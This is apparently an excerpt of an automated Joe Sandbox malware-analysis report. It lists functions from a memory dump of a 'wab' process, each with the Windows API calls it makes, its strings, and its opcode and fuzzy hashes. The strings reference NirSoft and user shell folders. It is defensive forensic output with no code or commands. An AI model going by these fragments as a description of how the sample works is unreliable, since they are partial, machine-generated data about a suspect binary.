                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                                                                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                                                    • Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                    • String ID: PD$PD
                                                                                                                                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2163313125-0
